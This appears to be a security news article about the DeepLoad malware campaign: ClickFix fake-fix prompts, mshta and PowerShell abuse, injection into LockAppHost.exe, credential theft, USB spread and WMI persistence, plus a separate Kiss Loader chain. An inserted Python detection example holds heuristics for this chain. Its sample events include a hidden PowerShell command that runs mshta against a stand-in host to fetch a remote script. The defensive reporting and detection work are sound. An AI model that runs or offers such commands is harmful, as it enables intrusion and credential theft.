New Malware DeepLoad Spreads Through Fake Fix Prompts and PowerShell Abuse

DeepLoad Malware Spreads Through ClickFix Social Engineering Campaign

Security researchers have uncovered a new cyberattack campaign using a deceptive tactic known as ClickFix to spread a previously unknown malware loader called DeepLoad.

According to researchers at ReliaQuest, the malware is designed to evade detection using advanced techniques, including AI-assisted obfuscation and stealthy process injection. Even when the main loader is blocked, the attack can still begin stealing user credentials immediately, including saved passwords and active sessions.


How the Attack Works

The attack starts with a fake prompt that tricks users into running a malicious command. Victims are instructed to paste a PowerShell command into the Windows Run dialog, under the false claim that it will fix a system issue.

Once executed, the command uses mshta.exe, a legitimate Windows tool, to download and run an obfuscated PowerShell script.

This script hides its real purpose by mixing malicious code with meaningless variables, making it harder for security tools to detect. Researchers believe AI tools were likely used to generate this obfuscation.


DeepLoad Hides Inside Legitimate Windows Processes

To avoid detection, DeepLoad disguises itself as a normal Windows process. It embeds its payload inside LockAppHost.exe, a legitimate executable responsible for managing the Windows lock screen.

The malware also takes extra steps to stay hidden:

  • Disables PowerShell command history
  • Uses native Windows functions instead of standard PowerShell commands
  • Avoids common monitoring tools that track suspicious activity

Fileless Execution and Advanced Evasion Techniques

DeepLoad avoids traditional detection by generating malicious components on the fly. It uses PowerShell’s Add-Type feature to compile C# code into a temporary DLL file stored in the system’s Temp folder.

Because the DLL is created dynamically under a random name each time, signature-based antivirus tools have little to match on and struggle to detect it.

Another key technique used is APC (Asynchronous Procedure Call) injection, which allows the malware to run inside trusted processes without writing its payload to disk. This method helps it bypass many security defenses.
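An added detection example, not from this article or the ReliaQuest report: a small Python scorer that runs process-creation heuristics for the chain described above (PowerShell reaching mshta.exe, Add-Type compiling a DLL under Temp via csc.exe, LockAppHost.exe started by a scripting host) over constructed Sysmon-style events. The event layout, the sample command lines and the PSReadLine history-saving heuristic are assumptions, not indicators taken from the report.

```python
"""Added example (not ReliaQuest's code): flag DeepLoad-style process-creation
events. Event tuples are (parent_image, image, command_line); all constructed."""
import re

# Constructed sample events mimicking Sysmon Event ID 1 fields.
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe",
     "powershell -w hidden -c mshta http://example.invalid/fix"),     # Run dialog
    ("powershell.exe", "mshta.exe", "mshta http://example.invalid/fix"),
    ("powershell.exe", "csc.exe",
     r"csc.exe /noconfig /out:C:\Users\u\AppData\Local\Temp\abc123.dll"),
    ("powershell.exe", "LockAppHost.exe", "LockAppHost.exe"),
    ("explorer.exe", "powershell.exe",
     "powershell -c Set-PSReadLineOption -HistorySaveStyle SaveNothing"),
    ("explorer.exe", "notepad.exe", "notepad.exe readme.txt"),        # benign
]

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe"}

def classify(parent: str, image: str, cmdline: str) -> list[str]:
    """Return the DeepLoad-style behaviours one event matches (empty = benign)."""
    p, i, c = parent.lower(), image.lower(), cmdline.lower()
    hits = []
    # Stage 1: the pasted "fix" command reaches a remote HTA through mshta.exe
    if i == "mshta.exe" and re.search(r"https?://", c):
        hits.append("mshta_remote_hta")
    if i in {"powershell.exe", "pwsh.exe"} and "mshta" in c:
        hits.append("powershell_spawns_mshta")
    # Stage 2: Add-Type compiles C# with csc.exe into a randomly named Temp DLL
    if i == "csc.exe" and p in SCRIPT_HOSTS and re.search(r"\\temp\\[^\\]+\.dll", c):
        hits.append("addtype_temp_dll")
    # Stage 3: LockAppHost.exe normally has a system parent, never a script host
    if i == "lockapphost.exe" and p in SCRIPT_HOSTS:
        hits.append("lockapphost_unusual_parent")
    # Anti-forensics (assumed mechanism): turning off PSReadLine history saving
    if "historysavestyle" in c and "savenothing" in c:
        hits.append("ps_history_disabled")
    return hits

def scan(events):
    """Map each event's command line to the behaviours it matched."""
    return {cmd: classify(par, img, cmd) for par, img, cmd in events}

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_EVENTS).items():
        print("ALERT" if hits else "ok   ", hits, cmd)
```

Each rule on its own is noisy in a real estate (developers legitimately spawn csc.exe); correlating two or more hits under the same PowerShell parent within a short window is the practical alert condition.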


Credential Theft and Browser Hijacking

DeepLoad is built to steal sensitive data from infected systems. Its capabilities include:

  • Extracting saved browser passwords
  • Capturing login credentials in real time
  • Installing a malicious browser extension that continues spying on user activity

The browser extension remains active across sessions unless manually removed.


USB Propagation and Silent Reinfection

One of the more dangerous features of DeepLoad is its ability to spread through USB drives. When a removable device is connected, the malware copies itself using deceptive file names such as:

  • ChromeSetup.lnk
  • Firefox Installer.lnk
  • AnyDesk.lnk

These files are designed to trick users into launching the malware again.

DeepLoad also ensures persistence using Windows Management Instrumentation (WMI). Even if the system appears clean, the malware can silently reinfect it after a few days without any user interaction.


Another Threat: Kiss Loader Delivered via Phishing Emails

In a separate report, researchers identified another malware loader called Kiss Loader, which is distributed through phishing emails.

The attack uses malicious URL shortcut files that connect to remote resources hosted on TryCloudflare. These files download additional payloads disguised as PDF documents.

Once executed, the infection chain:

  1. Runs a script that displays a fake PDF
  2. Establishes persistence on the system
  3. Downloads the Python-based Kiss Loader
  4. Deploys Venom RAT using APC injection

It remains unclear how widespread these attacks are, but the threat actor behind Kiss Loader has claimed to operate from Malawi.


Final Takeaway

DeepLoad highlights how modern malware is evolving. Instead of relying on obvious malicious files, attackers are now:

  • Blending into legitimate system processes
  • Avoiding disk-based detection
  • Using AI to make malware harder to analyze
  • Spreading quickly across devices and networks

This shift makes traditional security tools less effective and increases the need for behavior-based detection and user awareness.
